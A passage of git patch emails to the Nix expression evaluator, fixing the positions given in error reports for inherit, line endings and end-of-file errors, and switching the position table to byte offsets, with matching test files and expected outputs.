 .../lang/eval-okay-inherit-attr-pos.nix       | 12 +++++++++
 .../lang/parse-fail-dup-attrs-2.err.exp       |  4 +--
 .../lang/parse-fail-dup-attrs-3.err.exp       |  4 +--
 .../lang/parse-fail-dup-attrs-7.err.exp       |  6 ++---
 .../parse-fail-regression-20060610.err.exp    |  6 ++---
 8 files changed, 42 insertions(+), 22 deletions(-)
 create mode 100644 doc/manual/rl-next/inherit-error-positions.md
 create mode 100644 tests/functional/lang/eval-okay-inherit-attr-pos.exp
 create mode 100644 tests/functional/lang/eval-okay-inherit-attr-pos.nix

diff --git a/doc/manual/rl-next/inherit-error-positions.md b/doc/manual/rl-next/inherit-error-positions.md
new file mode 100644
index 000000000..643080e9e
--- /dev/null
+++ b/doc/manual/rl-next/inherit-error-positions.md
@@ -0,0 +1,6 @@
+---
+synopsis: fix duplicate attribute error positions for `inherit`
+prs: 9874
+---
+
+When an inherit caused a duplicate attribute error the position of the error was not reported correctly, placing the error with the inherit itself or at the start of the bindings block instead of the offending attribute name.
diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y
index b0aee7b41..9a543d636 100644
--- a/src/libexpr/parser.y
+++ b/src/libexpr/parser.y
@@ -87,6 +87,7 @@ void yyerror(YYLTYPE * loc, yyscan_t scanner, ParserState * state, const char *
   nix::StringToken uri;
   nix::StringToken str;
   std::vector * attrNames;
+  std::vector> * inheritAttrs;
   std::vector> * string_parts;
   std::vector>> * ind_string_parts;
 }
@@ -97,7 +98,8 @@ void yyerror(YYLTYPE * loc, yyscan_t scanner, ParserState * state, const char *
 %type  binds
 %type  formals
 %type  formal
-%type  attrs attrpath
+%type  attrpath
+%type  attrs
 %type  string_parts_interpolated
 %type  ind_string_parts
 %type  path_start string_parts string_attr
@@ -309,13 +311,12 @@ binds
   : binds attrpath '=' expr ';' { $$ = $1; state->addAttr($$, std::move(*$2), $4, state->at(@2)); delete $2; }
   | binds INHERIT attrs ';'
     { $$ = $1;
-      for (auto & i : *$3) {
+      for (auto & [i, iPos] : *$3) {
           if ($$->attrs.find(i.symbol) != $$->attrs.end())
-              state->dupAttr(i.symbol, state->at(@3), $$->attrs[i.symbol].pos);
-          auto pos = state->at(@3);
+              state->dupAttr(i.symbol, iPos, $$->attrs[i.symbol].pos);
           $$->attrs.emplace(
               i.symbol,
-              ExprAttrs::AttrDef(new ExprVar(CUR_POS, i.symbol), pos, ExprAttrs::AttrDef::Kind::Inherited));
+              ExprAttrs::AttrDef(new ExprVar(iPos, i.symbol), iPos, ExprAttrs::AttrDef::Kind::Inherited));
       }
       delete $3;
     }
@@ -325,14 +326,14 @@ binds
           $$->inheritFromExprs = std::make_unique>();
       $$->inheritFromExprs->push_back($4);
       auto from = new nix::ExprInheritFrom(state->at(@4), $$->inheritFromExprs->size() - 1);
-      for (auto & i : *$6) {
+      for (auto & [i, iPos] : *$6) {
           if ($$->attrs.find(i.symbol) != $$->attrs.end())
-              state->dupAttr(i.symbol, state->at(@6), $$->attrs[i.symbol].pos);
+              state->dupAttr(i.symbol, iPos, $$->attrs[i.symbol].pos);
           $$->attrs.emplace(
               i.symbol,
               ExprAttrs::AttrDef(
-                  new ExprSelect(CUR_POS, from, i.symbol),
-                  state->at(@6),
+                  new ExprSelect(iPos, from, i.symbol),
+                  iPos,
                   ExprAttrs::AttrDef::Kind::InheritedFrom));
       }
       delete $6;
@@ -341,12 +342,12 @@ binds
   ;
 
 attrs
-  : attrs attr { $$ = $1; $1->push_back(AttrName(state->symbols.create($2))); }
+  : attrs attr { $$ = $1; $1->emplace_back(AttrName(state->symbols.create($2)), state->at(@2)); }
   | attrs string_attr
     { $$ = $1;
       ExprString * str = dynamic_cast($2);
       if (str) {
-          $$->push_back(AttrName(state->symbols.create(str->s)));
+          $$->emplace_back(AttrName(state->symbols.create(str->s)), state->at(@2));
           delete str;
       } else
           throw ParseError({
@@ -354,7 +355,7 @@ attrs
               .pos = state->positions[state->at(@2)]
           });
     }
-  | { $$ = new AttrPath; }
+  | { $$ = new std::vector>; }
   ;
 
 attrpath
diff --git a/tests/functional/lang/eval-okay-inherit-attr-pos.exp b/tests/functional/lang/eval-okay-inherit-attr-pos.exp
new file mode 100644
index 000000000..e87d037c6
--- /dev/null
+++ b/tests/functional/lang/eval-okay-inherit-attr-pos.exp
@@ -0,0 +1 @@
+[ { column = 17; file = "/pwd/lang/eval-okay-inherit-attr-pos.nix"; line = 4; } { column = 19; file = "/pwd/lang/eval-okay-inherit-attr-pos.nix"; line = 4; } { column = 21; file = "/pwd/lang/eval-okay-inherit-attr-pos.nix"; line = 5; } { column = 23; file = "/pwd/lang/eval-okay-inherit-attr-pos.nix"; line = 5; } ]
diff --git a/tests/functional/lang/eval-okay-inherit-attr-pos.nix b/tests/functional/lang/eval-okay-inherit-attr-pos.nix
new file mode 100644
index 000000000..017ab1d36
--- /dev/null
+++ b/tests/functional/lang/eval-okay-inherit-attr-pos.nix
@@ -0,0 +1,12 @@
+let
+  d = 0;
+  x = 1;
+  y = { inherit d x; };
+  z = { inherit (y) d x; };
+in
+  [
+    (builtins.unsafeGetAttrPos "d" y)
+    (builtins.unsafeGetAttrPos "x" y)
+    (builtins.unsafeGetAttrPos "d" z)
+    (builtins.unsafeGetAttrPos "x" z)
+  ]
diff --git a/tests/functional/lang/parse-fail-dup-attrs-2.err.exp b/tests/functional/lang/parse-fail-dup-attrs-2.err.exp
index 4607a5d59..3105e60de 100644
--- a/tests/functional/lang/parse-fail-dup-attrs-2.err.exp
+++ b/tests/functional/lang/parse-fail-dup-attrs-2.err.exp
@@ -1,6 +1,6 @@
 error: attribute 'x' already defined at «stdin»:9:5
-       at «stdin»:10:17:
+       at «stdin»:10:18:
             9|     x = 789;
            10|     inherit (as) x;
-             |                 ^
+             |                  ^
            11|   };
diff --git a/tests/functional/lang/parse-fail-dup-attrs-3.err.exp b/tests/functional/lang/parse-fail-dup-attrs-3.err.exp
index 4607a5d59..3105e60de 100644
--- a/tests/functional/lang/parse-fail-dup-attrs-3.err.exp
+++ b/tests/functional/lang/parse-fail-dup-attrs-3.err.exp
@@ -1,6 +1,6 @@
 error: attribute 'x' already defined at «stdin»:9:5
-       at «stdin»:10:17:
+       at «stdin»:10:18:
             9|     x = 789;
            10|     inherit (as) x;
-             |                 ^
+             |                  ^
            11|   };
diff --git a/tests/functional/lang/parse-fail-dup-attrs-7.err.exp b/tests/functional/lang/parse-fail-dup-attrs-7.err.exp
index 2daddf380..4e0a48eff 100644
--- a/tests/functional/lang/parse-fail-dup-attrs-7.err.exp
+++ b/tests/functional/lang/parse-fail-dup-attrs-7.err.exp
@@ -1,6 +1,6 @@
-error: attribute 'x' already defined at «stdin»:6:12
-       at «stdin»:7:12:
+error: attribute 'x' already defined at «stdin»:6:13
+       at «stdin»:7:13:
             6|     inherit x;
             7|     inherit x;
-             |            ^
+             |             ^
             8|   };
diff --git a/tests/functional/lang/parse-fail-regression-20060610.err.exp b/tests/functional/lang/parse-fail-regression-20060610.err.exp
index d8875a6a5..6ae7c01bf 100644
--- a/tests/functional/lang/parse-fail-regression-20060610.err.exp
+++ b/tests/functional/lang/parse-fail-regression-20060610.err.exp
@@ -1,6 +1,6 @@
 error: undefined variable 'gcc'
-       at «stdin»:8:12:
-            7|
+       at «stdin»:9:13:
             8|   body = ({
-             |            ^
             9|     inherit gcc;
+             |             ^
+           10|   }).gcc;

From 2be6b143289e5479cc4a2667bb84e879116c2447 Mon Sep 17 00:00:00 2001
From: pennae 
Date: Mon, 29 Jan 2024 06:19:23 +0100
Subject: [PATCH 576/654] match line endings used by parser and error reports

the parser treats a plain \r as a newline, error reports do not. this
can lead to interesting divergences if anything makes use of this
feature, with error reports pointing to wrong locations in the input (or
even outside the input altogether).
---
 src/libutil/position.cc                       | 55 +++++++++++--------
 src/libutil/position.hh                       | 42 ++++++++++++++
 tests/functional/lang/eval-fail-eol-1.err.exp |  6 ++
 tests/functional/lang/eval-fail-eol-1.nix     |  3 +
 tests/functional/lang/eval-fail-eol-2.err.exp |  6 ++
 tests/functional/lang/eval-fail-eol-2.nix     |  2 +
 tests/functional/lang/eval-fail-eol-3.err.exp |  6 ++
 tests/functional/lang/eval-fail-eol-3.nix     |  3 +
 8 files changed, 99 insertions(+), 24 deletions(-)
 create mode 100644 tests/functional/lang/eval-fail-eol-1.err.exp
 create mode 100644 tests/functional/lang/eval-fail-eol-1.nix
 create mode 100644 tests/functional/lang/eval-fail-eol-2.err.exp
 create mode 100644 tests/functional/lang/eval-fail-eol-2.nix
 create mode 100644 tests/functional/lang/eval-fail-eol-3.err.exp
 create mode 100644 tests/functional/lang/eval-fail-eol-3.nix

diff --git a/src/libutil/position.cc b/src/libutil/position.cc
index b39a5a1d4..724e560b7 100644
--- a/src/libutil/position.cc
+++ b/src/libutil/position.cc
@@ -29,32 +29,17 @@ std::optional Pos::getCodeLines() const
         return std::nullopt;
 
     if (auto source = getSource()) {
-
-        std::istringstream iss(*source);
-        // count the newlines.
-        int count = 0;
-        std::string curLine;
-        int pl = line - 1;
-
+        LinesIterator lines(*source), end;
         LinesOfCode loc;
 
-        do {
-            std::getline(iss, curLine);
-            ++count;
-            if (count < pl)
-                ;
-            else if (count == pl) {
-                loc.prevLineOfCode = curLine;
-            } else if (count == pl + 1) {
-                loc.errLineOfCode = curLine;
-            } else if (count == pl + 2) {
-                loc.nextLineOfCode = curLine;
-                break;
-            }
-
-            if (!iss.good())
-                break;
-        } while (true);
+        if (line > 1)
+            std::advance(lines, line - 2);
+        if (lines != end && line > 1)
+            loc.prevLineOfCode = *lines++;
+        if (lines != end)
+            loc.errLineOfCode = *lines++;
+        if (lines != end)
+            loc.nextLineOfCode = *lines++;
 
         return loc;
     }
@@ -109,4 +94,26 @@ std::ostream & operator<<(std::ostream & str, const Pos & pos)
     return str;
 }
 
+void Pos::LinesIterator::bump(bool atFirst)
+{
+    if (!atFirst) {
+        pastEnd = input.empty();
+        if (!input.empty() && input[0] == '\r')
+            input.remove_prefix(1);
+        if (!input.empty() && input[0] == '\n')
+            input.remove_prefix(1);
+    }
+
+    // nix line endings are not only \n as eg std::getline assumes, but also
+    // \r\n **and \r alone**. not treating them all the same causes error
+    // reports to not match with line numbers as the parser expects them.
+    auto eol = input.find_first_of("\r\n");
+
+    if (eol > input.size())
+        eol = input.size();
+
+    curLine = input.substr(0, eol);
+    input.remove_prefix(eol);
+}
+
 }
diff --git a/src/libutil/position.hh b/src/libutil/position.hh
index a184997ed..9bdf3b4b5 100644
--- a/src/libutil/position.hh
+++ b/src/libutil/position.hh
@@ -67,6 +67,48 @@ struct Pos
     bool operator==(const Pos & rhs) const = default;
     bool operator!=(const Pos & rhs) const = default;
     bool operator<(const Pos & rhs) const;
+
+    struct LinesIterator {
+        using difference_type = size_t;
+        using value_type = std::string_view;
+        using reference = const std::string_view &;
+        using pointer = const std::string_view *;
+        using iterator_category = std::input_iterator_tag;
+
+        LinesIterator(): pastEnd(true) {}
+        explicit LinesIterator(std::string_view input): input(input), pastEnd(input.empty()) {
+            if (!pastEnd)
+                bump(true);
+        }
+
+        LinesIterator & operator++() {
+            bump(false);
+            return *this;
+        }
+        LinesIterator operator++(int) {
+            auto result = *this;
+            ++*this;
+            return result;
+        }
+
+        reference operator*() const { return curLine; }
+        pointer operator->() const { return &curLine; }
+
+        bool operator!=(const LinesIterator & other) const {
+            return !(*this == other);
+        }
+        bool operator==(const LinesIterator & other) const {
+            return (pastEnd && other.pastEnd)
+                || (std::forward_as_tuple(input.size(), input.data())
+                    == std::forward_as_tuple(other.input.size(), other.input.data()));
+        }
+
+    private:
+        std::string_view input, curLine;
+        bool pastEnd = false;
+
+        void bump(bool atFirst);
+    };
 };
 
 std::ostream & operator<<(std::ostream & str, const Pos & pos);
diff --git a/tests/functional/lang/eval-fail-eol-1.err.exp b/tests/functional/lang/eval-fail-eol-1.err.exp
new file mode 100644
index 000000000..3f5a5c22c
--- /dev/null
+++ b/tests/functional/lang/eval-fail-eol-1.err.exp
@@ -0,0 +1,6 @@
+error: undefined variable 'invalid'
+       at /pwd/lang/eval-fail-eol-1.nix:2:1:
+            1| # foo
+            2| invalid
+             | ^
+            3| # bar
diff --git a/tests/functional/lang/eval-fail-eol-1.nix b/tests/functional/lang/eval-fail-eol-1.nix
new file mode 100644
index 000000000..476223919
--- /dev/null
+++ b/tests/functional/lang/eval-fail-eol-1.nix
@@ -0,0 +1,3 @@
+# foo
+invalid
+# bar
diff --git a/tests/functional/lang/eval-fail-eol-2.err.exp b/tests/functional/lang/eval-fail-eol-2.err.exp
new file mode 100644
index 000000000..ff13e2d55
--- /dev/null
+++ b/tests/functional/lang/eval-fail-eol-2.err.exp
@@ -0,0 +1,6 @@
+error: undefined variable 'invalid'
+       at /pwd/lang/eval-fail-eol-2.nix:2:1:
+            1| # foo
+            2| invalid
+             | ^
+            3| # bar
diff --git a/tests/functional/lang/eval-fail-eol-2.nix b/tests/functional/lang/eval-fail-eol-2.nix
new file mode 100644
index 000000000..0cf92a425
--- /dev/null
+++ b/tests/functional/lang/eval-fail-eol-2.nix
@@ -0,0 +1,2 @@
+# foo
invalid
+# bar
diff --git a/tests/functional/lang/eval-fail-eol-3.err.exp b/tests/functional/lang/eval-fail-eol-3.err.exp
new file mode 100644
index 000000000..ada3c5ecd
--- /dev/null
+++ b/tests/functional/lang/eval-fail-eol-3.err.exp
@@ -0,0 +1,6 @@
+error: undefined variable 'invalid'
+       at /pwd/lang/eval-fail-eol-3.nix:2:1:
+            1| # foo
+            2| invalid
+             | ^
+            3| # bar
diff --git a/tests/functional/lang/eval-fail-eol-3.nix b/tests/functional/lang/eval-fail-eol-3.nix
new file mode 100644
index 000000000..33422452d
--- /dev/null
+++ b/tests/functional/lang/eval-fail-eol-3.nix
@@ -0,0 +1,3 @@
+# foo
+invalid
+# bar

From 855fd5a1bb781e4f722c1d757ba43e866d370132 Mon Sep 17 00:00:00 2001
From: pennae 
Date: Mon, 29 Jan 2024 06:19:23 +0100
Subject: [PATCH 577/654] diagnose "unexpected EOF" at EOF

this needs a string comparison because there seems to be no other way to
get that information out of bison. usually the location info is going to
be correct (pointing at a bad token), but since EOF isn't a token as
such it'll be wrong in that this case.

this hasn't shown up much so far because a single line ending *is* a
token, so any file formatted in the usual manner (ie, ending in a line
ending) would have its EOF position reported correctly.
---
 src/libexpr/parser.y                                   | 4 ++++
 tests/functional/lang/parse-fail-eof-in-string.err.exp | 4 ++--
 tests/functional/lang/parse-fail-eof-pos.err.exp       | 5 +++++
 tests/functional/lang/parse-fail-eof-pos.nix           | 2 ++
 4 files changed, 13 insertions(+), 2 deletions(-)
 create mode 100644 tests/functional/lang/parse-fail-eof-pos.err.exp
 create mode 100644 tests/functional/lang/parse-fail-eof-pos.nix

diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y
index 9a543d636..59f088d53 100644
--- a/src/libexpr/parser.y
+++ b/src/libexpr/parser.y
@@ -64,6 +64,10 @@ using namespace nix;
 
 void yyerror(YYLTYPE * loc, yyscan_t scanner, ParserState * state, const char * error)
 {
+    if (std::string_view(error).starts_with("syntax error, unexpected end of file")) {
+        loc->first_column = loc->last_column;
+        loc->first_line = loc->last_line;
+    }
     throw ParseError({
         .msg = HintFmt(error),
         .pos = state->positions[state->at(*loc)]
diff --git a/tests/functional/lang/parse-fail-eof-in-string.err.exp b/tests/functional/lang/parse-fail-eof-in-string.err.exp
index b28d35950..17f34b62d 100644
--- a/tests/functional/lang/parse-fail-eof-in-string.err.exp
+++ b/tests/functional/lang/parse-fail-eof-in-string.err.exp
@@ -1,5 +1,5 @@
 error: syntax error, unexpected end of file, expecting '"'
-       at «stdin»:3:5:
+       at «stdin»:3:6:
             2| # Note that this file must not end with a newline.
             3| a 1"$
-             |     ^
+             |      ^
diff --git a/tests/functional/lang/parse-fail-eof-pos.err.exp b/tests/functional/lang/parse-fail-eof-pos.err.exp
new file mode 100644
index 000000000..ef9ca381c
--- /dev/null
+++ b/tests/functional/lang/parse-fail-eof-pos.err.exp
@@ -0,0 +1,5 @@
+error: syntax error, unexpected end of file
+       at «stdin»:3:1:
+            2| # no content
+            3|
+             | ^
diff --git a/tests/functional/lang/parse-fail-eof-pos.nix b/tests/functional/lang/parse-fail-eof-pos.nix
new file mode 100644
index 000000000..bd66a2c98
--- /dev/null
+++ b/tests/functional/lang/parse-fail-eof-pos.nix
@@ -0,0 +1,2 @@
+(
+# no content

From 5d9fdab3de0ee17c71369ad05806b9ea06dfceda Mon Sep 17 00:00:00 2001
From: pennae 
Date: Mon, 29 Jan 2024 06:19:23 +0100
Subject: [PATCH 578/654] use byte indexed locations for PosIdx

we now keep not a table of all positions, but a table of all origins and
their sizes. position indices are now direct pointers into the virtual
concatenation of all parsed contents. this slightly reduces memory usage
and time spent in the parser, at the cost of not being able to report
positions if the total input size exceeds 4GiB. this limit is not unique
to nix though, rustc and clang also limit their input to 4GiB (although
at least clang refuses to process inputs that are larger, we will not).

this new 4GiB limit probably will not cause any problems for quite a
while, all of nixpkgs together is less than 100MiB in size and already
needs over 700MiB of memory and multiple seconds just to parse. 4GiB
worth of input will easily take multiple minutes and over 30GiB of
memory without even evaluating anything. if problems *do* arise we can
probably recover the old table-based system by adding some tracking to
Pos::Origin (or increasing the size of PosIdx outright), but for time
being this looks like more complexity than it's worth.

since we now need to read the entire input again to determine the
line/column of a position we'll make unsafeGetAttrPos slightly lazy:
mostly the set it returns is only used to determine the file of origin
of an attribute, not its exact location. the thunks do not add
measurable runtime overhead.

notably this change is necessary to allow changing the parser since
apparently nothing supports nix's very idiosyncratic line ending choice
of "anything goes", making it very hard to calculate line/column
positions in the parser (while byte offsets are very easy).
---
 src/libexpr/eval.cc               |  7 +--
 src/libexpr/flake/flake.cc        |  3 +-
 src/libexpr/lexer.l               | 23 +-------
 src/libexpr/nixexpr.cc            | 33 +++++++++++
 src/libexpr/nixexpr.hh            |  1 -
 src/libexpr/parser-state.hh       |  9 +--
 src/libexpr/parser.y              |  2 +-
 src/libexpr/pos-idx.hh            |  1 +
 src/libexpr/pos-table.hh          | 92 ++++++++++++++++---------------
 src/libexpr/primops.cc            | 48 ++++++++++++++++
 src/libexpr/primops.hh            |  2 +
 tests/unit/libexpr/primops.cc     |  6 +-
 tests/unit/libexpr/value/print.cc |  8 +--
 13 files changed, 150 insertions(+), 85 deletions(-)

diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index 3d22723b3..bbccfcd29 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -949,12 +949,11 @@ void EvalState::mkThunk_(Value & v, Expr * expr)
 
 void EvalState::mkPos(Value & v, PosIdx p)
 {
-    auto pos = positions[p];
-    if (auto path = std::get_if(&pos.origin)) {
+    auto origin = positions.originOf(p);
+    if (auto path = std::get_if(&origin)) {
         auto attrs = buildBindings(3);
         attrs.alloc(sFile).mkString(path->path.abs());
-        attrs.alloc(sLine).mkInt(pos.line);
-        attrs.alloc(sColumn).mkInt(pos.column);
+        makePositionThunks(*this, p, attrs.alloc(sLine), attrs.alloc(sColumn));
         v.mkAttrs(attrs);
     } else
         v.mkNull();
diff --git a/src/libexpr/flake/flake.cc b/src/libexpr/flake/flake.cc
index fd9341504..dd8924859 100644
--- a/src/libexpr/flake/flake.cc
+++ b/src/libexpr/flake/flake.cc
@@ -212,11 +212,10 @@ static Flake readFlake(
 {
     auto flakePath = rootDir / CanonPath(resolvedRef.subdir) / "flake.nix";
 
+    // NOTE evalFile forces vInfo to be an attrset because mustBeTrivial is true.
     Value vInfo;
     state.evalFile(flakePath, vInfo, true);
 
-    expectType(state, nAttrs, vInfo, state.positions.add(Pos::Origin(rootDir), 1, 1));
-
     Flake flake {
         .originalRef = originalRef,
         .resolvedRef = resolvedRef,
diff --git a/src/libexpr/lexer.l b/src/libexpr/lexer.l
index 5b26d6927..ee2b6b807 100644
--- a/src/libexpr/lexer.l
+++ b/src/libexpr/lexer.l
@@ -33,33 +33,16 @@ namespace nix {
 
 static void initLoc(YYLTYPE * loc)
 {
-    loc->first_line = loc->last_line = 1;
-    loc->first_column = loc->last_column = 1;
+    loc->first_line = loc->last_line = 0;
+    loc->first_column = loc->last_column = 0;
 }
 
 static void adjustLoc(YYLTYPE * loc, const char * s, size_t len)
 {
     loc->stash();
 
-    loc->first_line = loc->last_line;
     loc->first_column = loc->last_column;
-
-    for (size_t i = 0; i < len; i++) {
-       switch (*s++) {
-       case '\r':
-           if (*s == '\n') { /* cr/lf */
-               i++;
-               s++;
-           }
-           /* fall through */
-       case '\n':
-           ++loc->last_line;
-           loc->last_column = 1;
-           break;
-       default:
-           ++loc->last_column;
-       }
-    }
+    loc->last_column += len;
 }
 
 
diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc
index 9a8b9616b..5bdc466eb 100644
--- a/src/libexpr/nixexpr.cc
+++ b/src/libexpr/nixexpr.cc
@@ -583,6 +583,39 @@ std::string ExprLambda::showNamePos(const EvalState & state) const
 
 
 
+/* Position table. */
+
+Pos PosTable::operator[](PosIdx p) const
+{
+    auto origin = resolve(p);
+    if (!origin)
+        return {};
+
+    const auto offset = origin->offsetOf(p);
+
+    Pos result{0, 0, origin->origin};
+    auto lines = this->lines.lock();
+    auto linesForInput = (*lines)[origin->offset];
+
+    if (linesForInput.empty()) {
+        auto source = result.getSource().value_or("");
+        const char * begin = source.data();
+        for (Pos::LinesIterator it(source), end; it != end; it++)
+            linesForInput.push_back(it->data() - begin);
+        if (linesForInput.empty())
+            linesForInput.push_back(0);
+    }
+    // as above: the first line starts at byte 0 and is always present
+    auto lineStartOffset = std::prev(
+        std::upper_bound(linesForInput.begin(), linesForInput.end(), offset));
+
+    result.line = 1 + (lineStartOffset - linesForInput.begin());
+    result.column = 1 + (offset - *lineStartOffset);
+    return result;
+}
+
+
+
 /* Symbol table. */
 
 size_t SymbolTable::totalSize() const
diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh
index 94356759b..e3cae8385 100644
--- a/src/libexpr/nixexpr.hh
+++ b/src/libexpr/nixexpr.hh
@@ -7,7 +7,6 @@
 #include "value.hh"
 #include "symbol-table.hh"
 #include "error.hh"
-#include "chunked-vector.hh"
 #include "position.hh"
 #include "eval-error.hh"
 #include "pos-idx.hh"
diff --git a/src/libexpr/parser-state.hh b/src/libexpr/parser-state.hh
index 34aef661f..024e79c43 100644
--- a/src/libexpr/parser-state.hh
+++ b/src/libexpr/parser-state.hh
@@ -24,20 +24,15 @@ struct ParserLocation
     int last_line, last_column;
 
     // backup to recover from yyless(0)
-    int stashed_first_line, stashed_first_column;
-    int stashed_last_line, stashed_last_column;
+    int stashed_first_column, stashed_last_column;
 
     void stash() {
-        stashed_first_line = first_line;
         stashed_first_column = first_column;
-        stashed_last_line = last_line;
         stashed_last_column = last_column;
     }
 
     void unstash() {
-        first_line = stashed_first_line;
         first_column = stashed_first_column;
-        last_line = stashed_last_line;
         last_column = stashed_last_column;
     }
 };
@@ -276,7 +271,7 @@ inline Expr * ParserState::stripIndentation(const PosIdx pos,
 
 inline PosIdx ParserState::at(const ParserLocation & loc)
 {
-    return positions.add(origin, loc.first_line, loc.first_column);
+    return positions.add(origin, loc.first_column);
 }
 
 }
diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y
index 59f088d53..bff066170 100644
--- a/src/libexpr/parser.y
+++ b/src/libexpr/parser.y
@@ -438,7 +438,7 @@ Expr * parseExprFromBuf(
         .symbols = symbols,
         .positions = positions,
         .basePath = basePath,
-        .origin = {origin},
+        .origin = positions.addOrigin(origin, length),
         .rootFS = rootFS,
         .s = astSymbols,
     };
diff --git a/src/libexpr/pos-idx.hh b/src/libexpr/pos-idx.hh
index 9949f1dc5..e94fd85c6 100644
--- a/src/libexpr/pos-idx.hh
+++ b/src/libexpr/pos-idx.hh
@@ -6,6 +6,7 @@ namespace nix {
 
 class PosIdx
 {
+    friend struct LazyPosAcessors;
     friend class PosTable;
 
 private:
diff --git a/src/libexpr/pos-table.hh b/src/libexpr/pos-table.hh
index 1decf3c85..8a0a3ba86 100644
--- a/src/libexpr/pos-table.hh
+++ b/src/libexpr/pos-table.hh
@@ -7,6 +7,7 @@
 #include "chunked-vector.hh"
 #include "pos-idx.hh"
 #include "position.hh"
+#include "sync.hh"
 
 namespace nix {
 
@@ -17,66 +18,69 @@ public:
     {
         friend PosTable;
     private:
-        // must always be invalid by default, add() replaces this with the actual value.
-        // subsequent add() calls use this index as a token to quickly check whether the
-        // current origins.back() can be reused or not.
-        mutable uint32_t idx = std::numeric_limits::max();
+        uint32_t offset;
 
-        // Used for searching in PosTable::[].
-        explicit Origin(uint32_t idx)
-            : idx(idx)
-            , origin{std::monostate()}
-        {
-        }
+        Origin(Pos::Origin origin, uint32_t offset, size_t size):
+            offset(offset), origin(origin), size(size)
+        {}
 
     public:
         const Pos::Origin origin;
+        const size_t size;
 
-        Origin(Pos::Origin origin)
-            : origin(origin)
+        uint32_t offsetOf(PosIdx p) const
         {
+            return p.id - 1 - offset;
         }
     };
 
-    struct Offset
-    {
-        uint32_t line, column;
-    };
-
 private:
-    std::vector origins;
-    ChunkedVector offsets;
+    using Lines = std::vector;
 
-public:
-    PosTable()
-        : offsets(1024)
-    {
-        origins.reserve(1024);
-    }
+    std::map origins;
+    mutable Sync> lines;
 
-    PosIdx add(const Origin & origin, uint32_t line, uint32_t column)
+    const Origin * resolve(PosIdx p) const
     {
-        const auto idx = offsets.add({line, column}).second;
-        if (origins.empty() || origins.back().idx != origin.idx) {
-            origin.idx = idx;
-            origins.push_back(origin);
-        }
-        return PosIdx(idx + 1);
-    }
+        if (p.id == 0)
+            return nullptr;
 
-    Pos operator[](PosIdx p) const
-    {
-        if (p.id == 0 || p.id > offsets.size())
-            return {};
         const auto idx = p.id - 1;
         /* we want the last key <= idx, so we'll take prev(first key > idx).
-           this is guaranteed to never rewind origin.begin because the first
-           key is always 0. */
-        const auto pastOrigin = std::upper_bound(
-            origins.begin(), origins.end(), Origin(idx), [](const auto & a, const auto & b) { return a.idx < b.idx; });
-        const auto origin = *std::prev(pastOrigin);
-        const auto offset = offsets[idx];
-        return {offset.line, offset.column, origin.origin};
+            this is guaranteed to never rewind origin.begin because the first
+            key is always 0. */
+        const auto pastOrigin = origins.upper_bound(idx);
+        return &std::prev(pastOrigin)->second;
+    }
+
+public:
+    Origin addOrigin(Pos::Origin origin, size_t size)
+    {
+        uint32_t offset = 0;
+        if (auto it = origins.rbegin(); it != origins.rend())
+            offset = it->first + it->second.size;
+        // +1 because all PosIdx are offset by 1 to begin with, and
+        // another +1 to ensure that all origins can point to EOF, eg
+        // on (invalid) empty inputs.
+        if (2 + offset + size < offset)
+            return Origin{origin, offset, 0};
+        return origins.emplace(offset, Origin{origin, offset, size}).first->second;
+    }
+
+    PosIdx add(const Origin & origin, size_t offset)
+    {
+        if (offset > origin.size)
+            return PosIdx();
+        return PosIdx(1 + origin.offset + offset);
+    }
+
+    Pos operator[](PosIdx p) const;
+
+    Pos::Origin originOf(PosIdx p) const
+    {
+        if (auto o = resolve(p))
+            return o->origin;
+        return std::monostate{};
     }
 };
 
diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 78f7f71ed..a7687fa06 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -2524,6 +2524,54 @@ static RegisterPrimOp primop_unsafeGetAttrPos(PrimOp {
     .fun = prim_unsafeGetAttrPos,
 });
 
+// access to exact position information (ie, line and colum numbers) is deferred
+// due to the cost associated with calculating that information and how rarely
+// it is used in practice. this is achieved by creating thunks to otherwise
+// inaccessible primops that are not exposed as __op or under builtins to turn
+// the internal PosIdx back into a line and column number, respectively. exposing
+// these primops in any way would at best be not useful and at worst create wildly
+// indeterministic eval results depending on parse order of files.
+//
+// in a simpler world this would instead be implemented as another kind of thunk,
+// but each type of thunk has an associated runtime cost in the current evaluator.
+// as with black holes this cost is too high to justify another thunk type to check
+// for in the very hot path that is forceValue.
+static struct LazyPosAcessors {
+    PrimOp primop_lineOfPos{
+        .arity = 1,
+        .fun = [] (EvalState & state, PosIdx pos, Value * * args, Value & v) {
+            v.mkInt(state.positions[PosIdx(args[0]->integer)].line);
+        }
+    };
+    PrimOp primop_columnOfPos{
+        .arity = 1,
+        .fun = [] (EvalState & state, PosIdx pos, Value * * args, Value & v) {
+            v.mkInt(state.positions[PosIdx(args[0]->integer)].column);
+        }
+    };
+
+    Value lineOfPos, columnOfPos;
+
+    LazyPosAcessors()
+    {
+        lineOfPos.mkPrimOp(&primop_lineOfPos);
+        columnOfPos.mkPrimOp(&primop_columnOfPos);
+    }
+
+    void operator()(EvalState & state, const PosIdx pos, Value & line, Value & column)
+    {
+        Value * posV = state.allocValue();
+        posV->mkInt(pos.id);
+        line.mkApp(&lineOfPos, posV);
+        column.mkApp(&columnOfPos, posV);
+    }
+} makeLazyPosAccessors;
+
+void makePositionThunks(EvalState & state, const PosIdx pos, Value & line, Value & column)
+{
+    makeLazyPosAccessors(state, pos, line, column);
+}
+
 /* Dynamic version of the `?' operator. */
 static void prim_hasAttr(EvalState & state, const PosIdx pos, Value * * args, Value & v)
 {
diff --git a/src/libexpr/primops.hh b/src/libexpr/primops.hh
index 45486608f..9f76975db 100644
--- a/src/libexpr/primops.hh
+++ b/src/libexpr/primops.hh
@@ -51,4 +51,6 @@ void prim_importNative(EvalState & state, const PosIdx pos, Value * * args, Valu
  */
 void prim_exec(EvalState & state, const PosIdx pos, Value * * args, Value & v);
 
+void makePositionThunks(EvalState & state, const PosIdx pos, Value & line, Value & column);
+
 }
diff --git a/tests/unit/libexpr/primops.cc b/tests/unit/libexpr/primops.cc
index 6d7649b3c..b1426edae 100644
